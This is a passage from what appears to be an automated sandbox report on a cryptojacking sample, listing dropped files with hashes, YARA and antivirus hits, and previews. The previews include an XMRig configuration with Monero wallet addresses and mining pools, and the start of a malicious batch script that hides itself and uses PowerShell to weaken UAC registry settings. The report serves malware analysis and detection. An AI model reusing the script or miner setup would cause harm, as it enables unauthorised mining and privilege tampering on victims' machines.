                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\RtkAudio.exe, Author: Joe Security
                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown
                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\RtkAudio.exe, Author: Florian Roth
                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\RtkAudio.exe, Author: ditekSHen
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\RtkAudio.exe, Author: Joe Security
                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown
                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\RtkAudio.exe, Author: Florian Roth
                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\RtkAudio.exe, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`|..........................idata...F...p...H...B|.............@....CRT....h.............|.............@....tls.................|.............@....rsrc...S............|.............@....reloc..p............~.............@..B........................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):88576
                                                    Entropy (8bit):6.15492829325332
                                                    Encrypted:false
                                                    SSDEEP:1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
                                                    MD5:DDD12566B99343B96609AFA2524ECEC3
                                                    SHA1:8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
                                                    SHA-256:767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
                                                    SHA-512:B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):264
                                                    Entropy (8bit):5.579378925177609
                                                    Encrypted:false
                                                    SSDEEP:6:e5odPXvqzm8giMafKn71g7pqfAWFZLabXx1EXYfFROMfoIj:Yo9i6x7ao71g7plWPazAYEMTj
                                                    MD5:B01A9D0151625441C4FC500F2E227439
                                                    SHA1:0F2EC5AC6C9CFE12161512FC237E39335A82BF99
                                                    SHA-256:3EE3ED71F81D848BF7978E0137F475D670EC59596870B0FFE0C6D8FC397B48D0
                                                    SHA-512:A91635B587128EDBBFE1BF65E1AF3E66AA19E422BF00FCF78175756EC82022C61AB12E2AE484C2D1389CFA1CB5915EA3D1DB73242BD7D14E74BD917B49F60D96
                                                    Malicious:false
                                                    Preview:[RandomX]..wallet = 84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T..pool1 = auto.c3pool.org:13333..pool2 = auto.c3pool.org:443..pool3 = xmr.2miners.com:2222..pool4 = xmr.GHhA5Joo.com:2222..noLog = true..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):938
                                                    Entropy (8bit):5.57285235961628
                                                    Encrypted:false
                                                    SSDEEP:24:hDbdmeOM6p75x2iSkel575T96x7J7q7bel57536x7J7q7be9:ZhU1V5xvsP5x6BJ7q7CP536BJ7q7C9
                                                    MD5:73D059C6788D35FBF1CDC6ABD799DF52
                                                    SHA1:A6AF58E1C8EFCACC1A053E6BEA819067ACC0C8C4
                                                    SHA-256:C90CA39AE1993D6171792AE37D19768B887DB22D3912650F7E5FB938537FC77D
                                                    SHA-512:EE6057A92328E756599DFAF998081B88F56EDF486C8ADBB5EA8F7DA8B718693D502314C2260F9B1FDC7196F2033DDE7C30ABF06BAD8AB1F45655DF2599DFC9CD
                                                    Malicious:false
                                                    Preview:{.."autosave": true,.."background": true,.."title": true,.."cpu": true,.."opencl": false,.."cuda": false,.."retries": 1,.."retry-pause": 2,.."pools": [..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:13333",.."user": "8Bg9mc5vUWw8dL8jCxbVda9ukMHxpisqmfCaaUDbngS8jGRS7cuRu1HC6m2dEKZW7yBpDQ3fRQtFShEDXTSbQ9pf5Tk2Sut.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:443",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "xmr.2miners.com:2222",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..}..]..}..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):45568
                                                    Entropy (8bit):7.750275657742685
                                                    Encrypted:false
                                                    SSDEEP:768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
                                                    MD5:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                    SHA1:60E2F48A51C061BBA72A08F34BE781354F87AA49
                                                    SHA-256:B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
                                                    SHA-512:87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3241944
                                                    Entropy (8bit):6.300666139752175
                                                    Encrypted:false
                                                    SSDEEP:49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
                                                    MD5:A7CDE18F991E97037A7899B7669E2548
                                                    SHA1:0FD0B96FF150A1ECF93206C227A13148933F28CE
                                                    SHA-256:8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
                                                    SHA-512:1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3241944
                                                    Entropy (8bit):6.300666139752175
                                                    Encrypted:false
                                                    SSDEEP:49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
                                                    MD5:A7CDE18F991E97037A7899B7669E2548
                                                    SHA1:0FD0B96FF150A1ECF93206C227A13148933F28CE
                                                    SHA-256:8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
                                                    SHA-512:1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):37
                                                    Entropy (8bit):4.15487093296263
                                                    Encrypted:false
                                                    SSDEEP:3:oNUkh4E2J5xAIm:oN923fm
                                                    MD5:2A24ED88EC4A21FE3D87106433EE06FF
                                                    SHA1:C7EE67A293182EFFD0BBE583B3A484F9BEAB20BC
                                                    SHA-256:6D4E7882C1D8F228E75440CA4A1CF0D2A2355E9FBB174B79180E0C76E5E00A4D
                                                    SHA-512:BD48E20A04793B617C9C7873B96E23E7C83903F6E8524D204FB2DB81A82312590787FAD0394F21C4C288E7CC4C091C9D9E7A4D0543B2937D1725DA13D924B028
                                                    Malicious:false
                                                    Preview:C:\Users\user\AppData\Local\Temp\..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):37
                                                    Entropy (8bit):4.15487093296263
                                                    Encrypted:false
                                                    SSDEEP:3:oNUkh4E2J5xAIm:oN923fm
                                                    MD5:2A24ED88EC4A21FE3D87106433EE06FF
                                                    SHA1:C7EE67A293182EFFD0BBE583B3A484F9BEAB20BC
                                                    SHA-256:6D4E7882C1D8F228E75440CA4A1CF0D2A2355E9FBB174B79180E0C76E5E00A4D
                                                    SHA-512:BD48E20A04793B617C9C7873B96E23E7C83903F6E8524D204FB2DB81A82312590787FAD0394F21C4C288E7CC4C091C9D9E7A4D0543B2937D1725DA13D924B028
                                                    Malicious:false
                                                    Preview:C:\Users\user\AppData\Local\Temp\..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):8331776
                                                    Entropy (8bit):6.602098080859404
                                                    Encrypted:false
                                                    SSDEEP:98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
                                                    MD5:A6D4706BAEB9AB97490D745F7A2BB11E
                                                    SHA1:A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
                                                    SHA-256:96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
                                                    SHA-512:5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`|..........................idata...F...p...H...B|.............@....CRT....h.............|.............@....tls.................|.............@....rsrc...S............|.............@....reloc..p............~.............@..B........................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):8331776
                                                    Entropy (8bit):6.602098080859404
                                                    Encrypted:false
                                                    SSDEEP:98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
                                                    MD5:A6D4706BAEB9AB97490D745F7A2BB11E
                                                    SHA1:A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
                                                    SHA-256:96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
                                                    SHA-512:5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: Joe Security
                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: unknown
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: unknown
                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: Florian Roth
                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: ditekSHen
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`|..........................idata...F...p...H...B|.............@....CRT....h.............|.............@....tls.................|.............@....rsrc...S............|.............@....reloc..p............~.............@..B........................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):392704
                                                    Entropy (8bit):4.965701476357038
                                                    Encrypted:false
                                                    SSDEEP:6144:ZBULviqYnI3QA7JTXRnZSHL2GZbkG/TZgLgscSzNB:9qBlG/TZgUsjzNB
                                                    MD5:AC27DE51896A5BA2FD0DDA9B7955A201
                                                    SHA1:864A95DEF336B50C70300FF6A7C553F0095A535A
                                                    SHA-256:35D3F6C87CC33F2FDA5B594A6990D8D14E085E313564127A9C0606CEDB398F93
                                                    SHA-512:CD25F4BDC8E6DD845F5C836F50259E2E2C291D99B37071F30007FA13EDEB2D8C82880BF9EEFDB363309C9128F78C7E451954B98ABEFA039EA12E33548771D625
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6.Y.W...W...W....1..W....'..W.......W...W..<W.... ..W....0..W....5..W..Rich.W..................PE..L....@.T.....................<......S>............@..........................@..............................................d........`..n...............................................................@...............H............................text............................... ..`.rdata...I.......J..................@..@.data....0... ......................@....rsrc...n....`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    File Type:DOS batch file, ASCII text, with very long lines (363), with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):120766
                                                    Entropy (8bit):5.695506171656063
                                                    Encrypted:false
                                                    SSDEEP:3072:PgK8beoKKntiz73PXOAOZa0jgKX8rYNras:PgK8beoKKntiz73PXI4YNrL
                                                    MD5:602EF9CC2B8D87D8D621345889DD8854
                                                    SHA1:224A6ABC5AACC01210C1EE9438E275530D361C79
                                                    SHA-256:086F16F8993CC15AE596B638524985A25AE0C0199B5BD286D9B3EF516F408EAB
                                                    SHA-512:6D3D4732326177BD7779CF341A54FB287E72C41B8E8F421971A8867C5D19BF07649DBDFD9EF261D91F9FB3C895376343E5D97DE33EFE67EACEFDD0D887C6EF60
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\Start.cmd, Author: Joe Security
                                                    • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\Start.cmd, Author: Joe Security
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:@echo off..if not "%minimized%" == "" goto :minimized..set minimized=tru..start /min %WINDIR%\System32\cmd.exe /c "%~dpnx0"..goto :EOF..:minimized..(echo test)>"%temp%\Test1.txt"..(echo %~dp0)>"%temp%\PathView.txt"..Del /f /q "%temp%\NotAdmin1.txt">nul 2>nul..CD "%~dp0"..Set "wwwtime=0"..:wti..%WINDIR%\System32\reg.exe query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" 2>nul| %WINDIR%\System32\find.exe "0x0" >nul 2>nul..if "%ERRORLEVEL%" == "0" Goto :R_YADM..if "%UAAC%" == "1" Goto :RNoaaddd..%WINDIR%\System32\reg.exe query "HKCU\Software\Microsoft\Windows"..IF "%ERRORLEVEL%" == "1" Set "EReg=0"..IF "%EReg%" == "0" Goto :R_YADM..If "%wwwtime%" == "1" Goto :RNoaaddd.."%WINDIR%\System32\WindowsPowerShell\v1.0\PowerShell.exe" -Command "Start-Process cmd -ArgumentList '/c "%WINDIR%\System32\WindowsPowerShell\v1.0\PowerShell.exe" Set-Itemproperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Pol
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1072593
                                                    Entropy (8bit):6.09356912081639
                                                    Encrypted:false
                                                    SSDEEP:12288:R00eV1l1xLc8n0edZLCuKffxOW73ltrAnkUm3FhBhxahwPm6jFWNpfc8AccN4lRw:RDeV1BLci0edZL/OOW7ltCkOvX35F0h7
                                                    MD5:3C47D45F09948B8E6FDB5F96523BC60B
                                                    SHA1:A890EAAE8D5A45D54E7571C4BF780A6EB263586A
                                                    SHA-256:86BB64D0A8D548445E17D4EDEF0A0E5F97D019F3AF524FC9CD625294916C973D
                                                    SHA-512:6B67BB4268595480261FF007058F59AA4505204278B3B094551F14132E9FAF7160019B155831D9AB75D5CAB64C1AC9AD1CEB4A7B6FB5CED87E144E475A74790C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 64%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....R.....+...............L...l................@.................................j......... .........................................................................................................................(............................text...\...........................`.P`.data...d...........................@.`..rdata.............................@.`@/4...........P.......&..............@.0@.bss.....l...p........................`..idata...............<..............@.0..CRT.................L..............@.0..tls.... ............N..............@.0./14..................P..............@.@B/29......L... ...N...R..............@..B/41..........p......................@..B/55.................................@..B/67.................................@.0B/80.....@...........................@..B/91.................................@..B/102....................
                                                    Process:C:\Users\user\Desktop\K4gsPJGEi4.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1072593
                                                    Entropy (8bit):6.09356912081639
                                                    Encrypted:false
                                                    SSDEEP:12288:R00eV1l1xLc8n0edZLCuKffxOW73ltrAnkUm3FhBhxahwPm6jFWNpfc8AccN4lRw:RDeV1BLci0edZL/OOW7ltCkOvX35F0h7
                                                    MD5:3C47D45F09948B8E6FDB5F96523BC60B
                                                    SHA1:A890EAAE8D5A45D54E7571C4BF780A6EB263586A
                                                    SHA-256:86BB64D0A8D548445E17D4EDEF0A0E5F97D019F3AF524FC9CD625294916C973D
                                                    SHA-512:6B67BB4268595480261FF007058F59AA4505204278B3B094551F14132E9FAF7160019B155831D9AB75D5CAB64C1AC9AD1CEB4A7B6FB5CED87E144E475A74790C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 64%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....R.....+...............L...l................@.................................j......... .........................................................................................................................(............................text...\...........................`.P`.data...d...........................@.`..rdata.............................@.`@/4...........P.......&..............@.0@.bss.....l...p........................`..idata...............<..............@.0..CRT.................L..............@.0..tls.... ............N..............@.0./14..................P..............@.@B/29......L... ...N...R..............@..B/41..........p......................@..B/55.................................@..B/67.................................@.0B/80.....@...........................@..B/91.................................@..B/102....................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):6
                                                    Entropy (8bit):2.2516291673878226
                                                    Encrypted:false
                                                    SSDEEP:3:Hy:Hy
                                                    MD5:9F06243ABCB89C70E0C331C61D871FA7
                                                    SHA1:FDE773A18BB29F5ED65E6F0A7AA717FD1FA485D4
                                                    SHA-256:837CCB607E312B170FAC7383D7CCFD61FA5072793F19A25E75FBACB56539B86B
                                                    SHA-512:B947B99D1BADDD347550C9032E9AB60B6BE56551CF92C076B38E4E11F436051A4AF51C47E54F8641316A720B043641A3B3C1E1B01BA50445EA1BA60BFD1B7A86
                                                    Malicious:false
                                                    Preview:test..
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3241944
                                                    Entropy (8bit):6.300666139752175
                                                    Encrypted:false
                                                    SSDEEP:49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
                                                    MD5:A7CDE18F991E97037A7899B7669E2548
                                                    SHA1:0FD0B96FF150A1ECF93206C227A13148933F28CE
                                                    SHA-256:8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
                                                    SHA-512:1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):8331776
                                                    Entropy (8bit):6.602098080859404
                                                    Encrypted:false
                                                    SSDEEP:98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
                                                    MD5:A6D4706BAEB9AB97490D745F7A2BB11E
                                                    SHA1:A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
                                                    SHA-256:96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
                                                    SHA-512:5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`|..........................idata...F...p...H...B|.............@....CRT....h.............|.............@....tls.................|.............@....rsrc...S............|.............@....reloc..p............~.............@..B........................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):8331776
                                                    Entropy (8bit):6.602098080859404
                                                    Encrypted:false
                                                    SSDEEP:98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
                                                    MD5:A6D4706BAEB9AB97490D745F7A2BB11E
                                                    SHA1:A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
                                                    SHA-256:96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
                                                    SHA-512:5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
                                                    Malicious:true
                                                    Yara Hits:
